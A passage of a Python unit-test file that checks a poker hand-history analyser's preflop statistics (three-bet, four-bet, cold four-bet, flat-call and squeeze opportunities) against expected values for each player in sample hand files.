self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
file = '__P__LIFRFFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
file = '__P__LIFRFFFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
file = '__P__LIFRFFCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
file = '__P__LIFRFFCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.three_bet_def_opp(), msg=file + ' ' + player)
def test_enum_three_bet_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
file = '__P__FOFRFFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('call 3bet', tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
file = '__P__FOFRFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('4bet', tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
file = '__P__FOCRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
file = '__P__FOCRFFCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
file = '__P__LIFRFFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('4bet', tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
file = '__P__LIFRFFFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('call 3bet', tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
file = '__P__LIFRFFCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
file = '__P__LIFRFFCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_three_bet_def(), msg=file + ' ' + player)
def test_four_bet_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.four_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOFRFFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.four_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.four_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFFRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.four_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.four_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.four_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.four_bet_def_opp(), msg=file + ' ' + player)
def test_enum_four_bet_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_four_bet_def(), msg=file + ' ' + player)
file = '__P__FOFRFFRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual('call 4bet', tmp.enum_four_bet_def(), msg=file + ' ' + player)
file = '__P__FOCRFFFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_four_bet_def(), msg=file + ' ' + player)
file = '__P__FOCRFFFRRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual('5bet', tmp.enum_four_bet_def(), msg=file + ' ' + player)
file = '__P__FOCRFFRFRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual('5bet', tmp.enum_four_bet_def(), msg=file + ' ' + player)
file = '__P__FOCRFFRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual('call 4bet', tmp.enum_four_bet_def(), msg=file + ' ' + player)
file = '__P__FOCRFFCRFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
file = '__P__FOCRFFRCF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_four_bet_def(), msg=file + ' ' + player)
def test_cold_four_bet_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__ORFRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
file = '__P__ORCRFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
file = '__P__ORCCFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_opp(), msg=file + ' ' + player)
def test_cold_four_bet(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__ORFRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.cold_four_bet(), msg=file + ' ' + player)
file = '__P__ORCRFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
file = '__P__ORCCFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet(), msg=file + ' ' + player)
def test_cold_four_bet_def_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__ORRFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
file = '__P__ORRFFFFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
file = '__P__ORRFFFCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.cold_four_bet_def_opp(), msg=file + ' ' + player)
def test_enum_cold_four_bet_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__ORRFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('fold', tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
file = '__P__ORRFFFFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual('call 4bet', tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
file = '__P__ORRFFFCC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(None, tmp.enum_cold_four_bet_def(), msg=file + ' ' + player)
def test_flat_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__OFCRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat_opp(), msg=file + ' ' + player)
file = '__P__FOFCFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.flat_opp(), msg=file + ' ' + player)
def test_flat(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__OFCRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.flat(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
player = 'g5'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
file = '__P__FOFCFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.flat(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.flat(), msg=file + ' ' + player)
def test_sqz_opp(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = '__P__FOFRFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
file = '__P__FOCRFFRFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)
file = '__P__FOCCFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)
file = '__P__LIFRFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
file = '__P__LICFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)
file = '__P__LICRFFFFF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
player = 'g1'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g2'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g3'
tmp = Preflop(hand, player)
self.assertEqual(False, tmp.sqz_opp(), msg=file + ' ' + player)
player = 'g4'
tmp = Preflop(hand, player)
self.assertEqual(True, tmp.sqz_opp(), msg=file + ' ' + player)
def test_sqz(self):
